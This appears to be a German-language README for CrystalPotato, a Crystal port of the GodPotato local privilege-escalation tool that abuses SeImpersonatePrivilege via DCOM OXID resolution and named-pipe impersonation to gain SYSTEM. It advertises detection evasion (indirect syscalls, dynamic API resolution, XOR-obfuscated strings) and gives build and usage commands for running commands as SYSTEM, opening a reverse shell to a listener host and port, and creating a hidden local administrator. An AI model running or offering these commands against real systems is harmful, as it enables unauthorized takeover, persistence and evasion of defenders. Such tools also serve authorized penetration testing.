
Crystal-Port von GodPotato zur Ausnutzung von SeImpersonatePrivilege mit indirekten Syscalls, dynamischer API-Auflösung und String-Obfuskation zur Kompilierzeit. Befehle ausführen, Reverse Shells starten oder Benutzer hinzufügen.
Crystal-Port von GodPotato, einer lokalen Privilegienausweitung von Konten mit SeImpersonatePrivilege zu SYSTEM. Es funktioniert durch Missbrauch des DCOM-OXID-Resolvers und Named-Pipe-Impersonation.
Windows-APIs werden dynamisch aufgelöst und über indirekte Syscall-Stubs aufgerufen, alle Zeichenfolgen werden zur Kompilierzeit XOR-obfuskiert und standardmäßig wird nur die Befehlsausgabe ausgegeben. Getestet auf Windows 10, 11 und Server 2025.
CrystalPotato kompiliert mit Crystal on Windows zu einer einzigen Datei ohne Abhängigkeiten:
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static
Einen Befehl ausführen, eine Reverse Shell starten oder einen lokalen Administrator erstellen.
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

GodPotato - Ursprüngliche C#-Implementierung von BeichenDream.
RustPotato - Rust-Implementierung von safedv.
SigmaPotato - C#-Implementierung mit zusätzlichen Funktionen von tylerdotrar.
| Flag | Beschreibung |
|---|
-c CMD | Als SYSTEM auszuführender Befehl oder Shell für die Reverse Shell (Standard: cmd.exe) |
-H HOST | Reverse-Shell-Listener-Host |
-P PORT | Reverse-Shell-Listener-Port |
-u USER | Lokalen Administrator erstellen - Benutzername |
-pw PASS | Lokalen Administrator erstellen - Passwort |
-p NAME | Benutzerdefinierter Pipe-Name (Standard: Crystal) |
-d | Debug-Ausgabe |
-dd | Vollständige Ablaufverfolgung |
-h | Hilfe anzeigen |